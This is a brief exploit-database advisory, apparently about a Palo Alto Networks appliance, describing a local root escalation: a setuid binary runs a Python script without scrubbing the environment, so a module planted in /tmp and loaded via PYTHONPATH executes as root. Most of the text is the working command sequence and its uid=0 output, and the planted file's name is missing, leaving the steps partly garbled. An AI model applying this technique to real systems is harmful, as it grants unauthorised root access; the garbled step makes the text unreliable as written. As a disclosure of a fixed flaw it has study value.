Source: The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script: $ ls -l /usr/local/bin/root_trace -rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace As the environment is not scrubbed, you can just do something like this: $ cat /tmp/ import os os.system("id") os._exit(0); $ PYTHONPATH=/tmp root_trace uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin) This was fixed by PAN: # Iranian Exploit DataBase = http://IeDb.Ir [2016-11-21]